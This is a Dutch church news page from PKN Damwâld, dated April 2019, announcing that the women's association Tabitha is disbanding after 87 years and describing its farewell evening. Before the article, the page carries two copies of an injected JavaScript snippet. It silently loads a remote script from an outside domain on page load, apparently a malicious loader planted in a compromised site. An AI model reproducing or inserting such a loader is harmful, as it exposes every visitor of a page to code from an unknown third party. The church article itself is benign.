;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Het einde van een tijdperk … de Hervormde vrouwenvereniging Tabitha stopt ermee - PKN Damwâld

Het einde van een tijdperk … de Hervormde vrouwenvereniging Tabitha stopt ermee

Gepubliceerd op: donderdag 18 april 2019

In de vroegere verzuilde samenleving was een (hervormde-) vrouwenvereniging niet alleen een belangrijk christelijk, maar zeer zeker ook een maatschappelijk/sociaal bindmiddel. Onze vrouwenvereniging Tabitha, die op 3 november 1932 werd opgericht, is ontegenzeggelijk van groot belang geweest voor de opbouw en ontwikkeling van onze kerkelijke gemeente. Het doel van Tabitha was niet voor niets het leggen en versterken van onderlinge banden en samen te streven naar verdieping van het geestelijk leven. Vele activiteiten, zoals de roemruchte bazar’s, werden ontplooid ter ondersteuning van het gemeenteleven en voor hen die dat behoefden. Er is in het verloop van de jaren uiteraard veel veranderd bij de vrouwenvereniging.  Vergrijzing en te weinig actieve leden noopten het bestuur tot jammerlijke opheffing. En dat kwam niet als een verrassing. “We hadden die laatste jaren geen instroom meer van nieuwe leden. En jaarlijks verouderde het ledenbestand. Met nog maar amper 16 zeer trouwe en actieve leden was er onvoldoende draagvlak om de vereniging in de benen te houden, zo vertelde Geke van Kammen, de presidente van Tabitha. Dat het doek valt, is erg jammer, zeker voor de leden waarvoor de bijeenkomsten echt ‘uitjes’ waren en deze als meerwaarde in hun leven ervaarden. Tabitha stond niet alleen midden in onze kerkelijke gemeente maar zeker ook in de maatschappij. Op 17 april 2019 kwam met een gezellige slotavond een einde aan het jarenlange bestaan van Tabitha. Als verrassing hield de Friese cabaretier en komiek Taeke van der Meer een zeer vermakelijk optreden. Uiteraard werd de presidente bedankt voor haar werkzaamheden in de afgelopen jaren, maar werden ook de leden geprezen voor hun trouwe inzet en opkomst. Ouderling-kerkrentmeester Eabele van der Schaaf bood namens de kerkenraad alle leden een presentje aan als symbolische dankzegging voor de bijdrage van alle Tabitha-leden in de loop der jaren. Als gemeente mogen we dankbaar zijn voor al die mooie jaren.